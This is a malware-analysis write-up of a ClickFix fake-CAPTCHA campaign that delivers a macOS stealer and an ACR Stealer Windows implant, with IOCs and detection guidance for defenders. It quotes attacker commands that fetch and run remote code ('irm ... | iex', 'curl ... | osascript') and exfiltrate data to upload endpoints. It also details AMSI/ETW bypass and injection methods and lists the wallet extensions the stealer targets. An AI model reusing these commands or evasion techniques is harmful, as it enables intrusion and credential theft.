Inside the petshub[.]qa ClickFix: From a Fake CAPTCHA to an ACR Stealer Implant

Noman Nasir MinhasPublished malware-analysisclickfixinfostealeracr-stealer

Full teardown of the petshub[.]qa ClickFix campaign: a fake CAPTCHA that drops a blockchain-resolved macOS stealer and a four-stage Windows chain ending in an ACR Stealer implant flagged by 33/69 engines — Realtek masquerade, Heaven's Gate, and CVE-2024-38193 in tow.

Share

This is the full technical write-up of a multi-platform ClickFix social-engineering campaign — from a pasted "verification" command to a fully extracted macOS stealer and a Windows DLL that masquerades as Realtek audio software, then turns out to be an ACR Stealer implant. All analysis was performed defensively and offline; no payload was ever executed, and the final Windows implant was extracted by emulating its own reflective-DLL bootstrap inside an instruction-emulator sandbox.

Date of analysis: 2026-09-17 Campaign ID (txid): 5d12220d804398a29476a3d568e65115 Implant SHA-256: d44014357482639ecf824f4fced48c0eeb1b6f93524813ad9865eefd3376ddf2

#TL;DR

  • The lure is a ClickFix page — a fake "reCAPTCHA / robot verification" prompt that tells the victim to paste a command into Terminal (macOS) or PowerShell (Windows). It was served from petshub[.]qa, a legitimate-looking pet-supplies storefront in Doha, Qatar — the classic ClickFix pattern of a compromised WooCommerce site hosting a cloaked lure.
  • The macOS chain resolves its command-and-control through a Polygon smart contract (0xA3a603F8a454a9c905b4c579Bb72628F7C15C2A0) — killing the C2 means waiting out a blockchain, not burning a domain — then drops an AMOS-style backdoor and a commercial-grade stealer branded "Essential macOS Stealer — Build: GETWELL".
  • The Windows chain runs a four-stage pipeline — a self-integrity-checked PowerShell decoy → a 32-bit loader with an HWBP+VEH AMSI/ETW/WLDP bypass → APC-injected sRDI shellcode (XOR + aPLib) → a 610 KB PE32 implant masquerading as Realtek HD Audio.
  • When that implant is detonated, sandbox network telemetry identifies it as ACR Stealer (AcridRain): its C2 domains are requests[.]nicotine[.]surf, enable-debug[.]empower[.]surf, and mail[.]novaform[.]cc, and it is tagged by VirusTotal with CVE-2024-38193 — an afd.sys privilege-escalation exploit in the payload.
  • 33/69 security vendors flag the implant as malicious.

#The Lure: a Pet Store in Doha, a CAPTCHA That Isn't One

ClickFix is the current front line of commodity initial access. The pattern is always the same: a page displays a fake error or verification prompt — "verify you are human", "fix your video player / font" — whose "solution" is a clipboard command the victim is told to paste into a system shell. JavaScript silently copies the command to the clipboard; the victim presses Win+R (or opens Terminal), pastes, and hits Enter. The social-engineering win is that the malware runs with the user's own privileges and the user's own hands — no exploit, no drive-by download, no browser 0-day required.

What makes this campaign worth writing up is where the lure lives. petshub[.]qa is — or was — a run-of-the-mill e-commerce site selling flea-and-tick treatments and cat litter. That is the point. Threat actors overwhelmingly prefer to hijack a real, working site (WordPress/WooCommerce are the favorites precisely because they are ubiquitous and rarely patched) and inject a cloaked script that only fires for desktop visitors. A quick manual look at the site shows nothing; a targeted Windows or macOS visitor gets the fake CAPTCHA. The benign domain is the camouflage — it survives reputation checks, and every link pointing at it looks legitimate until it isn't.

The campaign analyzed here runs the same operator infrastructure against both macOS and Windows victims, and both chains converge on the same command-and-control architecture.

#Command-and-Control on a Blockchain

The most operationally interesting design decision is how the macOS chain finds its C2.

Rather than hard-coding a domain, the first-stage malware issues a standard JSON-RPC eth_call against four public Polygon RPC endpoints (polygon[.]drpc[.]org, polygon[.]publicnode[.]com, polygon-mainnet[.]gateway[.]tatum[.]io, tenderly[.]rpc[.]polygon[.]community) to a single contract:

Contract0xA3a603F8a454a9c905b4c579Bb72628F7C15C2A0
Function selector0x2686ecea
Methodeth_call, block latest
Return valueABI-encoded string → C2 hostname
Value observed (2026-09-17)jse8x92s[.]me

The client parses the ABI-encoded response by hand — string offset at bytes 0–63, length at 64–127, data at 128+ — using nothing but sed, xxd and bash. Because the RPC endpoints are legitimate, high-reputation services, the beaconing looks like ordinary blockchain traffic; and because the C2 address lives in contract state, the operator can rotate infrastructure with a single transaction while every deployed sample keeps pointing at the chain. Takedowns now require either a hard fork or waiting out the attacker's hosting budget.

Note the scoping, because it matters later: the on-chain resolution is the macOS chain's bootstrap. The Windows chain's final payload — as the sandbox telemetry below shows — is a commodity ACR Stealer build that phones home to its own C2 network instead. Two different infrastructure layers, one operator.

#The macOS Chain

#Stage 0 — the pasted command

The victim pastes:

TEXT
osascript -e "$(echo <base64 blob> | base64 -d)"

Base64 is the only "obfuscation" at this layer; it exists to make the paste look like a verification token rather than a script.

#Stage 1 — LaunchAgent persistence

The decoded layer-1 AppleScript writes ~/Library/LaunchAgents/com.fwvfahbogiryrgky.plist — Label com.fwvfahbogiryrgky, KeepAlive + RunAtLoad — whose ProgramArguments are /bin/bash -c "echo '<b64>' | base64 -d | osascript". It then launchctl unload/loads the agent so persistence activates immediately, not after reboot. From this point, every reboot re-enters the chain.

#Stage 2 — the on-chain resolver

The persisted script is an obfuscated AppleScript (strings rebuilt from (ASCII character N) calls, plus dead numeric variables) that performs the contract lookup described above, then connects to the resolved C2:

TEXT
curl -X POST https://<C2> -d 'txid=5d12220d804398a29476a3d568e65115&bmodule' | osascript

txid is the campaign/build identifier — the same value appears in every POST body on both platforms, which makes it a high-confidence network IOC.

#Stage 3 — bmodule: the AMOS-style backdoor

The C2 serves bmodule, a ~33 KB AppleScript backdoor in the style of the Atomic (AMOS) macOS stealer family:

  • Fingerprinting — hardware UUID via four fallbacks (ioreg → system_profiler …), username via four fallbacks (whoami, id -un, $USER, logname). Redundancy is deliberate: it survives hardened hosts that restrict any single tool.
  • On-chain C2 re-resolution with a curl -d "check" health check.
  • Password phishing. The backdoor validates the victim's login password with dscl . authonly (including the empty-password edge case). If it's wrong, it displays a native-looking System Preferences dialog — "To run the application you need to change the settings for its operation. Please enter password for continue:" — with a hidden-answer field and a 150-second timeout, and loops until the correct password is entered. The password is written to ~/.passphrase for the stealer to reuse.
  • Registration. POST uuid=<uuid>&username=<user>&txid=<id>&connect; on a newconnect response it records ~/.txid and runs tccutil reset All — wiping every privacy grant in the TCC database so the file access that follows generates no macOS consent prompts.
  • Task loop. Every 60 seconds it polls POST …&task and dispatches modules by piping C2 responses into osascript or sh:
TaskModulePurpose
runloadersmodulefull stealer
runlightlmodulelight stealer
replacerledgercrypto-wallet replacer (currently a disabled 34-byte stub — a capability in reserve)
openshellshellreverse shell (issued only to registered victims)

#The Stealer: "Essential macOS Stealer — Build: GETWELL"

Both smodule and lmodule identify themselves in the exfiltrated UserInformation file as "Essential macOS Stealer — Build: GETWELL" — this is a product, not a bespoke script, and it is being delivered through this campaign's infrastructure. lmodule is a strict subset that omits the Notes export, the Safari cookie grab and the Desktop/Documents file grabber.

The victim record stages into per-module /tmp directories and writes Username, Password (read back from ~/.passphrase — the password phished by the backdoor, packaged alongside everything else), and UserInformation (stealer banner, username, password, public IP via plain-HTTP api[.]ipify[.]org, and a system_profiler dump).

The stealer sweeps eleven Chromium-based browsers — Chrome, Chrome Beta/Canary/Dev, Chromium, Brave, Edge, Vivaldi, Opera, OperaGX, Yandex — across Default and every Profile* folder, copying cookies, Web Data (autofill/cards), Login Data (saved passwords), history, local storage, Local Extension Settings and IndexedDB. Firefox profiles are swept for key4.db, logins.json, cookies.sqlite, signons.sqlite and friends.

Wallet and password-manager data is lifted by Chrome extension ID from the extension storage directories — 177 unique wallet-extension IDs (MetaMask, Phantom, Rabby, OKX, Coinbase, Solflare, Xverse, TronLink, Keplr, Petra, Martian, Backpack, Magic Eden, and on) and 16 password-manager extensions (1Password, Bitwarden, LastPass, NordPass, Dashlane, Proton Pass, Keeper, Enpass, iCloud Passwords…). Full tables in Appendix A and B. A stealer that grabs password-manager vault databases and the browser's Safe Storage key doesn't just get cryptocurrency — it gets every saved credential the victim has.

Beyond the browser: 22 desktop wallet clients are copied wholesale (Exodus, Electrum, Atomic, Sparrow, Wasabi, Bitcoin Core, Monero, Ledger Live, Trezor Suite, TON Keeper, …), Telegram Desktop's entire tdata/ folder is taken (session theft → account takeover without 2FA re-entry), Apple Notes are exported in plaintext (smodule only), Safari's cookie jar is duplicated, and a file grabber collects Desktop and Documents files under 250 KB up to a 5 MB total — with source folders renamed to random d<6-digit> names so exfil bundles can't be mapped back to the victim's real directory layout.

Keychain handling is version-aware: on macOS ≥ 26.4 it recovers per-browser "Safe Storage" secrets with security find-generic-password -w -s "<browser> Safe Storage" for Chrome, Edge, Brave, Opera and Vivaldi (works because the stealer already runs as the logged-in user — the phished password isn't even needed); on older macOS it copies the entire login.keychain-db.

Exfiltration zips the staging dir with ditto and POSTs it as multipart — txid=<id>, file=@<zip>, uuid=<uuid> — to https://<C2>/upload.php, falling back to http://62[.]60[.]226[.]50/upload.php (or preferring it directly for zips over 90 MB). Upload status lands in /tmp/updstat.txt.

#The Windows Chain

#Stage 1 — the tamper-proofed decoy

The Windows lure is a 96 KB heavily obfuscated PowerShell script that displays a fake "reCAPTCHA V3 VERIFICATION" console with a verification ID (3a39b2ef-5cc4-419e-b10b-fb3d671839a7) and countdown. Behind the theater are two serious engineering choices:

  • Self-integrity checking. An Add-Type C# helper computes an FNV-style hash over the script's own body between #<hwRT7DEE> / #</hwRT7DEE> markers. On mismatch — any edit, including defanging or sandbox instrumentation — sentinel variables are poisoned and every subsequent guard silently exits. The script refuses to run if you touch it.
  • Anti-analysis. Host-name checks (ISE|ServerRemoteHost), parent-process regex for debugger/IDE processes, breakpoint counters, Debugger.IsAttached, $NestedPromptLevel, $DebugPreference.

The real payload is three lines in the middle: launch a hidden 32-bit (SysWOW64) PowerShell and run:

TEXT
irm rawcdn[.]githack[.]com/F819-39-A/764-D-A148-B414/refs/heads/main/f4-87-219-ef-1028-a0-9f-bc-6c | iex

Staging stage 2 on a GitHub raw-content proxy makes the fetch look like static-site content and lets the operator rotate payloads without touching the lure.

#Stage 2 — the loader

The GitHub-hosted loader (1.3 MB) is a fully in-memory .NET loader:

  • A 32-bit guard (it refuses to run under 64-bit PowerShell — the whole chain deliberately lives in SysWOW64, where the final implant's Heaven's Gate trick operates).
  • A hardware-breakpoint AMSI/ETW/WLDP bypass: debug registers DR0–DR7 arm breakpoints on AmsiScanBuffer, AmsiScanString, EtwEventWrite and WldpIsClassInApprovedList; a vectored exception handler intercepts the traps and neutralizes scanning and telemetry; afterwards the debug registers are zeroed and the VEH removed — no resident hooks left behind for scanners to find.
  • 257,557 bytes of shellcode stored as five XOR-encrypted byte arrays (key cb204ae7566b298c81c47074ffe0509f), decrypted by a runtime-compiled IL method.
  • Injection: spawn hidden SysWOW64\rundll32.exe (fallback openwith.exe) with no arguments → VirtualAllocEx(RW) → WriteProcessMemory → VirtualProtectEx(RX) → OpenThread → QueueUserAPC on the main thread → resume.

#Stage 3 — sRDI shellcode

With the XOR layer removed offline, the blob's entry is a single call +0x3E48B that lands on a ~3 KB sRDI (Shellcode Reflective DLL Injection) bootstrap:

  • Walks fs:[0x18] → TEB → PEB → InLoadOrderModuleList to find kernel32's export directory.
  • Resolves 7 APIs by hash (h = 0x6c6c6a62; h = h*0x1f + (c|0x20)): VirtualAlloc, VirtualProtect, ExitProcess, VirtualFree, LoadLibraryA, GetModuleHandleA, GetProcAddress.
  • Reads a config header self-located via the entry call's return address: decompressed size 610,816; compressed size 254,978; a 128-byte XOR key; a flags byte set to wipe the source buffers after load; and an aPLib-compressed DLL.
  • Load sequence: XOR-decrypt → aPLib-decompress → reflective map (headers, sections, HIGHLOW relocations, imports, TLS callbacks, and on Windows 10+ a pattern-search for LdrpHandleTlsData inside ntdll) → wipe → DllMain(base, DLL_PROCESS_ATTACH, 0).

#Stage 4 — how the last layer was cracked

The decompressed PE is encrypted twice over: its entry code seeds a key from the live stack pointer and from KUSER_SHARED_DATA.Cookie — a per-boot, per-machine random value at a fixed address — so there is no offline key. Static analysis is impossible by design.

The solution was to let the malware unwrap itself — in a sandbox that is not a computer. A Unicorn x86-32 harness was built that provides a hand-crafted fake TEB/PEB and loader module list (a minimal synthetic kernel32 PE with real MZ/PE headers and a synthetic export directory), the 7 hashed APIs as Python stubs with correct stdcall semantics, instruction-level hooks for the two fs:[0x18] reads, a deliberately zeroed fake ntdll (so the LdrpHandleTlsData pattern search fails harmlessly), and stop hooks at the TLS-callback, entrypoint and DllMain call sites.

Execution was halted at the moment the bootstrap finished mapping the DLL and was about to call DllMain — and the pristine decompressed PE plus the fully mapped image were dumped to disk. The implant never executed a single instruction of its own payload logic.

#The Implant Under the Microscope: VirusTotal and the ACR Stealer Attribution

Once the fully-extracted implant (d4401435…ddf2, 610,816 bytes) is submitted, the picture changes from "unknown Realtek masquerade" to a specific, identifiable commodity stealer.

#Attribution: ACR Stealer (AcridRain)

Three independent signal layers in the VirusTotal report converge on the same family:

  • Network IDS rules. Proofpoint's Emerging Threats rules fire three "ET MALWARE Observed ACR Stealer Domain" alerts — one each for the TLS SNI of requests[.]nicotine[.]surf, enable-debug[.]empower[.]surf, and mail[.]novaform[.]cc. Abuse.ch's SSL Blocklist separately flags "Malicious SSL certificate detected (ACRStealer C&C)" — twice, for two different certs.
  • Behavior. The sandbox tags the sample crypto and the MBC catalog records Cryptocurrency / Bitcoin access — a stealer signature, not an audio driver.
  • Masquerade + evasion. The version resource claims Realtek's RtkAudioService.exe v10.0.19042.4879 on an unsigned file, and the YARA engine independently matches the Heaven's Gate rule (32-bit → 64-bit mode switch). A legitimately-signed Realtek service does not do Heaven's Gate.

ACR Stealer (a.k.a. AcridRain) is a known infostealer that has been sold and resold through Telegram channels, and its C2 domains follow a distinctive, rotating .surf / .cc / .nicotine / .empower / .novaform pattern. The campaign operator is, at minimum, a customer of that infrastructure.

#The C2 it actually talks to

The implant's observed network activity is a short list, and the high-signal entries are all ACR Stealer C2:

URLResponse
https://requests[.]nicotine[.]surf/05fe7713-4e18-b22d-525b413925e0200
https://enable-debug[.]empower[.]surf/8645-7f5a31344b9e200
https://mail[.]novaform[.]cc/v1/firelog/legacy/batchlog/8e54d8fa403
https://mail[.]novaform[.]cc/spi/v2/platforms/8e54d8fa/gmp/8e54d8fa/settings403
https://dns[.]google/dns-query400

The 8e54d8fa GUID is the victim/install identifier; the firelog and gmp endpoints are the stealer's telemetry and settings channels. The remaining ~29 contacted domains in the report are Firefox, Mozilla and Microsoft hosts — the sandbox's browser noise, a side effect of the implant injecting into Firefox. Notably, jse8x92s[.]me — the on-chain-resolved macOS C2 — does not appear: the Windows implant and the macOS chain ride different infrastructure.

#CVE-2024-38193: an exploit in the payload

The most jarring label in the detection set is Kaspersky's UDS:Exploit.Win64.CVE-2024-38193, reinforced by VirusTotal's own tags cve-2024-38193, exploit, and spreader.

CVE-2024-38193 is the Windows Ancillary Function Driver for WinSock (afd.sys) use-after-free elevation-of-privilege bug — a kernel-pool vulnerability reachable by any unprivileged process that can call socket(), of the same family this author has written about separately. Its presence here means the stealer is not content to run as the logged-in user: it carries a kernel privilege-escalation primitive, most plausibly to reach SYSTEM for token theft, persistence, or defense-evasion operations that a plain user-mode stealer cannot perform.

#Detection landscape

33 of 69 engines flag the file. The spread is informative — the file is heavily packed/encrypted, so static engines that need a signature largely miss it, while heuristic and dynamic engines catch it:

VendorVerdict
KasperskyUDS:Exploit.Win64.CVE-2024-38193
ESET-NOD32Win32/GenKryptik.HUPM
SophosMal/EncPk-AOL
MicrosoftTrojan:Win32/Wacatac.B!ml
CrowdStrike FalconWin/malicious_confidence_70% (D)
ElasticMalicious (high Confidence)
BitDefender / GData / Emsisoft / eScan / VIPREGen:Variant.Adware.Midie.67653
AhnLab-V3Trojan/Win.Crypt.C5943556
Avast / AVGWin32:MalwareX-gen [Pws]
SymantecML.Attribute.HighConfidence
MalwarebytesGeneric.Malware/Suspicious

VirusTotal's own "popular threat label" is trojan.midie/encpk, with family labels midie, encpk, abadware. The midie/encpk/Pws cluster is the tell: these are generic packed-PE and password-stealer signatures, which is exactly how a packed ACR Stealer looks to signature engines.

#Sandbox behavior

Beyond the network, the behavioral capture is worth reading closely:

  • Process injection into Firefox. The implant injects into C:\Program Files\Mozilla Firefox\firefox.exe, which is why the report is full of Mozilla/Microsoft telemetry — the browser makes those requests, not the implant. Injecting into the browser is how a stealer reads cookies, sessions, and autofill from inside the process that owns them.
  • Firefox profile cloning. The Sigma rule "Suspicious Binaries and Scripts in Public Folder" (The DFIR Report) matched on C:\Users\Public\.ff_tmp\prefs.js and prefs-1.js — the stealer staging a copied Firefox profile in a world-readable Public folder, the classic pre-exfil cookie grab.
  • A dropped PowerShell payload. Among the 12 dropped files is izf5mjamsTFa8d8y.ps1, a 4.77 MB PowerShell script that 23/60 engines flag. The implant is dropping a further PowerShell stage — consistent with the campaign's shell-first architecture, and a reminder that "the DLL" is not the end of the chain.
  • Behavior tags. calls-wmi, checks-network-adapters, crypto, macro-powershell, obfuscated, detect-debug-environment.

#PE structure and metadata

PropertyValue
TypePE32 (GUI) Intel 80386 — 32-bit, matching the SysWOW64 chain
Size596.50 KB (610,816 bytes)
SignedNo (claims Realtek)
Imphashfa48bde0d88f8952c0eb49ac6798fb45
SSDEEP12288:SNnBoazbTnq4f7ttuwRiZmjo9Xy28z/5DnY3k:SNnBt/jLuwwmo9Xy2khD7
TLSHT171D4AF65E6D393F1E9936132B12EF32F9E715E01C539CECADBE519429A33300921FA61
First seen in the wild2026-09-17 14:01:09 UTC

The section table is the fingerprint of the self-modifying loader:

SectionRaw sizeEntropyRead
.text402,4326.63encrypted/self-modifying code — the KUSER_SHARED_DATA-cookie-keyed decryption
.rdata86,0164.41imports/strings
.data100,3520.16mostly zeros — the sparse runtime config (screen-resolution table, etc.)
.rsrc2,0484.52the Realtek version resource + manifest
.reloc18,9446.74relocation data

The high-entropy .text against the near-zero-entropy .data is a textbook packed-PE profile. Statically imported APIs are deliberately minimal — 28 locale/path/text helpers across KERNEL32/USER32/SHELL32/ole32 — with everything else resolved dynamically at runtime. The C2 configuration only materializes under the cookie-derived decryption, which is why static extraction yields nothing and the sandbox is what surfaces nicotine[.]surf and friends.

#MITRE ATT&CK and MBC

Condensed to the high-signal techniques the sandbox and static analysis support:

TacticTechniques
ExecutionT1047 WMI, T1059 Command/Scripting, T1106 Native API, T1203 Exploitation for Client Execution
Privilege EscalationT1055 Process Injection, T1548 Abuse Elevation Control (→ CVE-2024-38193)
Defense EvasionT1027 Obfuscated Files, T1036 Masquerading, T1497 Sandbox Evasion, T1562 Impair Defenses, T1564 Hide Artifacts
Credential AccessT1003 OS Credential Dumping, T1552 Unsecured Credentials, T1555 Credentials from Password Stores
DiscoveryT1082 System Info, T1012 Query Registry, T1033 User Discovery, T1057 Process Discovery
CollectionT1005 Data from Local System, T1185 Browser Session Hijacking
C2T1071 Application Layer Protocol, T1573 Encrypted Channel
ImpactT1485 Data Destruction, T1486 Data Encrypted for Impact

MBC adds the anti-analysis specifics: Debugger Detection, Sandbox Detection, Dynamic Analysis Evasion, Cryptocurrency/Bitcoin access, and Asynchronous Procedure Call injection — the last one matching the stage-2 QueueUserAPC technique exactly.

#Detection and Defense

#macOS

SignalSeverity
osascript executing base64 piped from curl/echoHigh — canonical ClickFix stage 0
LaunchAgent whose ProgramArguments contain base64 -d | osascriptHigh
tccutil reset All executed by any non-admin user processCritical — near-exclusive to this class of malware
dscl . authonly as a child of osascriptHigh — password phishing validation
Creation of ~/.passphrase or ~/.txidHigh
Multipart POST to */upload.php containing txid=5d12220d804398a29476a3d568e65115High network IOC

#Windows

SignalSeverity
64-bit PowerShell spawning a hidden SysWOW64 PowerShellHigh
QueueUserAPC targeting a thread of an argumentless, hidden rundll32.exeHigh
DR-register writes to DR0–DR7 followed by AddVectoredExceptionHandlerHigh — HWBP AMSI tampering pattern
VirtualProtectEx flipping a remote rundll32 allocation RW→RXHigh
PowerShell fetching content from rawcdn[.]githack[.]comMedium (legitimate service, abuse context)
Unsigned 32-bit DLL claiming Realtek RtkAudioService.exe v10.0.19042.4879High — signature/masquerade mismatch
Outbound TLS SNI to *[.]nicotine[.]surf, *[.]empower[.]surf, *[.]novaform[.]ccHigh — ACR Stealer C2

Blocklist the ACR Stealer C2 domains (requests[.]nicotine[.]surf, enable-debug[.]empower[.]surf, mail[.]novaform[.]cc) and alert on their TLS SNI. The txid=5d12220d… POST body and the Polygon contract 0xA3a603F8a454a9c905b4c579Bb72628F7C15C2A0 (selector 0x2686ecea) are network IOCs that cut across both platforms; monitoring outbound eth_call traffic to public Polygon RPCs from non-browser processes is a defensible, low-noise hunt.

#User-facing

No legitimate verification flow — CAPTCHA, font fix, video codec, or otherwise — will ever ask you to paste a command into Terminal or PowerShell. That single sentence, repeated in security-awareness training, neutralizes the entire chain.

#Indicators of Compromise

#Network

IndicatorContext
jse8x92s[.]memacOS C2 (resolved from the Polygon contract)
https://jse8x92s[.]me/upload.phpmacOS stealer exfil
62[.]60[.]226[.]50 / http://62[.]60[.]226[.]50/upload.phpfallback / >90 MB exfil server
requests[.]nicotine[.]surf, enable-debug[.]empower[.]surf, mail[.]novaform[.]ccACR Stealer C2 (Windows implant)
rawcdn[.]githack[.]com/F819-39-A/764-D-A148-B414/refs/heads/main/f4-87-219-ef-1028-a0-9f-bc-6cWindows stage-2 URL
polygon[.]drpc[.]org, polygon[.]publicnode[.]com, polygon-mainnet[.]gateway[.]tatum[.]io, tenderly[.]rpc[.]polygon[.]communitylegitimate RPC endpoints abused for C2 resolution
api[.]ipify[.]org (over HTTP)victim public-IP lookup

#Blockchain

IndicatorValue
Polygon contract0xA3a603F8a454a9c905b4c579Bb72628F7C15C2A0
Function selector0x2686ecea

#Campaign identifiers

IndicatorValue
txid / build ID (both platforms)5d12220d804398a29476a3d568e65115
macOS stealer product tag"Essential macOS Stealer, Build: GETWELL"
Fake verification ID (Windows decoy)3a39b2ef-5cc4-419e-b10b-fb3d671839a7

#Sample hashes

SampleSizeMD5SHA-256
macOS stage 0 (pasted command)18,7216ca5a9c4c6bfa76581324ae13b5e44a50f1efcc8784c3a845204d3a31367e03d95d77c611d031d1711a27d93bb82d770
bmodule backdoor32,93445908247437994cfb7a20ed4dd0f542ee12b55305af9a2af890c0aa0aea96eb51bdd4c1c1d1679d4a19cfc429bbccd1c
smodule full stealer202,024893d331c539e3eb69a54b66e3bb4d8e247ecadfc95556d6a00aa7a414eb3f54080ddd957bcb0542d0fdadbd833eee904
lmodule light stealer170,94327fa375e7b98202ac83ea545ec9f0707f6f06c48c81b98ac181b1b5660154e475e9b8dcb344efe809a648fecdcbb13fb
Windows stage 1 decoy96,17993321cf113b1ee91f25e5fa906e23b448da5a05f2f5c68d7913c1459fb85e639744f18d681a88adbc3262251e6ee59bb
Windows stage 2 loader1,364,5326bdde0c83d3f5cbe9ca1a372580e1de33e7fd1a1346d72e2579ff5e0d6378af1f92be197ff27373ba53e25b622453e66
Final implant DLL610,8168cf176541efa359fe95a270e8a2fad2dd44014357482639ecf824f4fced48c0eeb1b6f93524813ad9865eefd3376ddf2

Final implant (from VirusTotal): SHA-1 1d373936b86242b2c5e5c65185bd1a91efb1ee89, imphash fa48bde0d88f8952c0eb49ac6798fb45.

All hashes in one block — click Copy to grab the full set:

TEXT
macOS stage 0 (pasted command)   MD5      6ca5a9c4c6bfa76581324ae13b5e44a5
macOS stage 0 (pasted command)   SHA-256  0f1efcc8784c3a845204d3a31367e03d95d77c611d031d1711a27d93bb82d770
bmodule backdoor                 MD5      45908247437994cfb7a20ed4dd0f542e
bmodule backdoor                 SHA-256  e12b55305af9a2af890c0aa0aea96eb51bdd4c1c1d1679d4a19cfc429bbccd1c
smodule full stealer             MD5      893d331c539e3eb69a54b66e3bb4d8e2
smodule full stealer             SHA-256  47ecadfc95556d6a00aa7a414eb3f54080ddd957bcb0542d0fdadbd833eee904
lmodule light stealer            MD5      27fa375e7b98202ac83ea545ec9f0707
lmodule light stealer            SHA-256  f6f06c48c81b98ac181b1b5660154e475e9b8dcb344efe809a648fecdcbb13fb
Windows stage 1 decoy            MD5      93321cf113b1ee91f25e5fa906e23b44
Windows stage 1 decoy            SHA-256  8da5a05f2f5c68d7913c1459fb85e639744f18d681a88adbc3262251e6ee59bb
Windows stage 2 loader           MD5      6bdde0c83d3f5cbe9ca1a372580e1de3
Windows stage 2 loader           SHA-256  3e7fd1a1346d72e2579ff5e0d6378af1f92be197ff27373ba53e25b622453e66
Final implant DLL                MD5      8cf176541efa359fe95a270e8a2fad2d
Final implant DLL                SHA-1    1d373936b86242b2c5e5c65185bd1a91efb1ee89
Final implant DLL                SHA-256  d44014357482639ecf824f4fced48c0eeb1b6f93524813ad9865eefd3376ddf2
Final implant DLL                imphash  fa48bde0d88f8952c0eb49ac6798fb45
Final implant DLL                ssdeep   12288:SNnBoazbTnq4f7ttuwRiZmjo9Xy28z/5DnY3k:SNnBt/jLuwwmo9Xy2khD7
Final implant DLL                TLSH     T171D4AF65E6D393F1E9936132B12EF32F9E715E01C539CECADBE519429A33300921FA61

#Appendix A — targeted browser wallet extensions (177 unique IDs)

#WalletChrome extension ID
1Metamask Walletnkbihfbeogaeaoehlefnkodbefgpgknn
2Trust Walletegjidjbpglichdcondbcbdnbeeppgdph
3Finnie Walletcjmkndjhnagcfbpiemnkdpomccnjblmj
4Crypto.com Wallethifafgmccdpekplomjjkcfgodnhcellj
5InspectCrypto Walletkamfleanhcmjelnhaeljonilnmjpkcjc
6Razor Walletfdcnegogpncmfejlfnffnofpngdiejii
7ZilPay Walletklnaejjgbibmhlephnhpmaofohgkpgkd
8KardiaChain Walletpdadjkfkgcafgbceimcpbkalnfnepbnk
9Ultra Walletkjjebdkfeagdoogagbhepmbimaphnfln
10Leather Walletldinpeekobnhjjdofggfgjlcehhmanlj
11Cyano Walletdkdedlpgdmmkkfjabffeganieamfklkm
12Hycon Lite Client Walletbcopgchhojmggmffilplmbdicgaihlkp
13FRWT Walletkpfchfdkjhcoekhdldggegebfakaaiog
14Xverse Walletidnnbdplmphpflfnlkomgpfbpcgelopg
15ABC Walletmlhakagmgkmonhdonhkpjeebfphligng
16Clown Walletbipdhagncpgaccgdbddmbpcabgjikfkn
17CLV Walletnhnkbkgjikgcigadomkphalanndcapjk
18Solflare Walletbhhhlbepdkbapadjdnnojkbgioiodbic
19Zerion Walletklghhnkeealcohjjanjjdaeeggmfmlpl
20Fewcha Move Walletebfidpplhabeedpnhjnobghokpiioolj
21Surf Walletemeeapjkbcbpbpgaagfchmcgglmebnen
22MyTonWalletfldfpgipfncgndfolcbkdeeknbbbnhcc
23OpenMask Walletpenjlddjkjgpnkllboccdgccekpkcbin
24Oxygen Atomic Walletfhilaheimglignddkjgofkcbgekhenbh
25Ctrl Wallethmeobnfnfcmdkdcmlblgagmfpfboieaf
26Atomic Walletgjnckgkfmgmibbkoficdidcljeaaaheg
27LeafWalletcihmoadaighcejopammfbmddcmdekcje
28TonKeeper Walletomaabbefbmiijedngplfjmnooppbclkk
29Braavos Bitcoin Walletjnlgamecbpmbajjfhmmmlhejkemejdma
30Cosmostation Walletfpkhgmpbidmiogeglndfbkegfdlnajnf
31Wombat Gaming Walletamkmjjmmflddogmhpjloimipbofnfjih
32ICONex Walletflpiciilemghbmfalicajoolhkkenfel
33Coin98 Walletaeachknmefphepccionboohckonoeemg
34BitMask Walletmomakdpclmaphlamgjcndbgfckjfpemp
35TezBox Walletmnfifefkajgofkcjkemidiaecocnkjeh
36XcelPay Walletehjiblpccbknkgimiflboggcffmpphhp
37Beam Web Walletilhaljfiglknggcoegeknjghdgampffk
38Stargazer Walletpgiaagfkgcbnmiiolekcfmljdagdhlcm
39Ronin Walletfnjhmkhhmkbjkkabndcnnogagogbneec
40Phantom Walletbfnaelmomeimhlpmgjnjophhpkkoljpa
41NC Walletimlcamfeniaidioeflifonfjeeppblda
42ROSE Walletppdadbejkmjnefldpcdjhnkpbjkikoip
43EVER Walletcgeeodpfagjceefieflmdfphplkenlfk
44Ready Walletdlcobpjiigpikoobohmabehhmhfoodbb
45Bitget Walletjiidiaalihmmhddjgbnbgdfflelocpak
46XDCPay Walletbocpokimicclpaiekenaeelehdjllofo
47Slope Walletpocmplpaccanhmnllbbkpgfliimjljgo
48NeoLinecphhlgmgameodnhkjdmkpanlelnlohao
49OKX Walletmcohilncbfahbmgdjkbpemcciiolgcge
50BlockWalletbopcbmipnjdcdfflfgjdgdjejmgpoaab
51Suiet Sui Walletkhpkpbbcccdmmclmpigdgddabeilkdpd
52Petra Aptos Walletejjladinnckdgjemekebdpeokbikhfci
53Pontem Crypto Walletphkbamefinggmakgklpkljjmgibohnba
54Sender Walletepapihdplajcdnnkdeiahlgigofloibg
55Flow Wallethpclkefagolihohboafpheddmmgdffjm
56XTON Walletcjookpbkjnpkmknedggeecikaponcalb
57Gate Walletcpmkedoipcpimgecpmgpldfpohjplkpp
58Vanta Walletmodjfdjcodmehnpccdjngmdfajggaoeh
59TronLinkibnejdfjmmkpcnlpebklmnkoeoihofec
60MathWalletafbcbjpbpfadlkmhmclhkeeodmamcflc
61iWalletkncchdigobghenbbaddojjnnaogfppfj
62Martian Aptos Walletefbglgofoippbgcjepnhiblaibcnclgk
63Zapit Walletfccgmnglbhajioalokbcidhcaikhlcpm
64CWalletapnehcjmnengpnmccpaibjmhhoadaico
65Pali Walletmgffkfbidihjpoaomajlbgchddlicgpn
66Suku Walletfopmedgnkfpebgllppeddmmochcookhc
67Polymesh Walletjojhfeoedkpkglbfimdfabpdfjaoolaf
68Casper Walletabkahkcbhngaebpcgfmhkoioedceoigp
69Bitverse Walletgkeelndblnomfmjnophbhfhcjbcnemka
70Tronium Tron Walletpnndplcbkakcplkjnolgbkdgjikjednm
71ASI Alliance Walletellkdbaphhldpeajbepobaecooaoafpg
72Energy8 Walletmdnaglckomeedfbogeajfajofmfgpoae
73Nabox Walletnknhiehlklippafakaeklbeglecifhad
74Internet Money Walletckklhkaabbmdjkahiaaplikpdddkenic
75Forbole X Walletfmblappgoiilbgafhjklehhfifbdocee
